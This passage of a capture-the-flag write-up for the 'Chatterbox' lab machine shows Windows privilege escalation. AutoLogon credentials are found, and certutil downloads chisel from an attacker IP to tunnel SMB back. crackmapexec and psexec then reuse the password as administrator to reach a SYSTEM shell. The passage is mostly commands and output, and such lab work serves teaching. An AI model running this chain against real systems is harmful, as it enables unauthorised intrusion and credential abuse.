C:\Users\Alfred : Alfred [AllAccess]
C:\Users\All Users
C:\Users\Default
C:\Users\Default User
C:\Users\Public : Interactive [WriteData/CreateFiles]
Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultUserName : Alfred
DefaultPassword : Welcome1!
We do a netstat to check running services and we see 445. This wasn't showing before, so it must be running as localhost:
C:\Windows\system32>netstat -ano
netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 664
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING 356
TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING 716
We will try chisel.
We serve and copy chisel across:
╭─kali@kali /opt/chisel
╰─$ ls
chisel_1.9.1_linux_386 chisel_1.9.1_linux_amd64 chisel_1.9.1_windows_386 chisel_1.9.1_windows_amd64
╭─kali@kali /opt/chisel
╰─$ serve 9000
The tun0 IP is 10.10.14.16 and the eth0 IP is 192.168.1.5.
Starting HTTP server on port 9000...
Serving HTTP on 0.0.0.0 port 9000 (http://0.0.0.0:9000/) ...
C:\>cd temp
cd temp
The system cannot find the path specified.
C:\>mkdir temp
mkdir temp
C:\>cd temp
cd temp
C:\temp>certutil -urlcache -split -f http://10.10.14.16:9000/chisel_1.9.1_windows_386 c:\temp\chisel_1.9.1_windows_386
certutil -urlcache -split -f http://10.10.14.16:9000/chisel_1.9.1_windows_386 c:\temp\chisel_1.9.1_windows_386
**** Online ****
000000 ...
838e00
CertUtil: -URLCache command completed successfully.
C:\temp>
On the Kali machine:
╭─kali@kali ~/HTB/chatterbox/chisel
╰─$ chmod +x chisel_1.9.1_linux_386 1 ↵
╭─kali@kali ~/HTB/chatterbox/chisel
╰─$ sudo chisel_1.9.1_linux_386 server -p 8000 --reverse
sudo: chisel_1.9.1_linux_386: command not found
╭─kali@kali ~/HTB/chatterbox/chisel
╰─$ sudo ./chisel_1.9.1_linux_386 server -p 8000 --reverse 1 ↵
2023/11/13 06:20:19 server: Reverse tunnelling enabled
2023/11/13 06:20:19 server: Fingerprint H9zO0dAUeZfvK7cwUURc5U35auqUSnQ/zsneseO3c8c=
2023/11/13 06:20:19 server: Listening on http://0.0.0.0:8000
On the Windows machine:
C:\temp>.\chisel_1.9.1_windows_386 client 10.10.14.16:8000 R:445:localhost:445
.\chisel_1.9.1_windows_386 client 10.10.14.16:8000 R:445:localhost:445
2023/11/13 11:21:22 client: Connecting to ws://10.10.14.16:8000
2023/11/13 11:21:24 client: Connected (Latency 306.0175ms)
We do an nmap scan of port 445 on the Kali box:
╭─kali@kali ~/HTB/chatterbox/chisel
╰─$ nmap -p 445 10.10.14.16 130 ↵
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-13 06:27 EST
Nmap scan report for 10.10.14.16
Host is up (0.00019s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
We try crackmapexec with the creds we had. Note that we are doing it against our Kali IP:
╭─kali@kali ~/HTB/chatterbox/chisel
╰─$ crackmapexec smb 10.10.14.16 -u 'Alfred' -p 'Welcome1!' --shares
SMB 10.10.14.16 445 CHATTERBOX [*] Windows 7 Professional 7601 Service Pack 1 (name:CHATTERBOX) (domain:Chatterbox) (signing:False) (SMBv1:True)
SMB 10.10.14.16 445 CHATTERBOX [+] Chatterbox\Alfred:Welcome1!
SMB 10.10.14.16 445 CHATTERBOX [+] Enumerated shares
SMB 10.10.14.16 445 CHATTERBOX Share Permissions Remark
SMB 10.10.14.16 445 CHATTERBOX ----- ----------- ------
SMB 10.10.14.16 445 CHATTERBOX ADMIN$ Remote Admin
SMB 10.10.14.16 445 CHATTERBOX C$ Default share
SMB 10.10.14.16 445 CHATTERBOX IPC$ Remote IPC
Tried psexec with the credentials but this failed:
╭─kali@kali /usr/share/doc/python3-impacket/examples
╰─$ ./psexec.py 'Alfred:Welcome1!@10.10.14.16' cmd
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on 10.10.14.16.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
I tried this with administrator and the same password, as this may be the default for admin as well.
╰─$ ./psexec.py 'administrator:Welcome1!@10.10.14.16' cmd 1 ↵
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on 10.10.14.16.....
[*] Found writable share ADMIN$
[*] Uploading file gLNhGggU.exe
[*] Opening SVCManager on 10.10.14.16.....
[*] Creating service ZVTB on 10.10.14.16.....
[*] Starting service ZVTB.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32>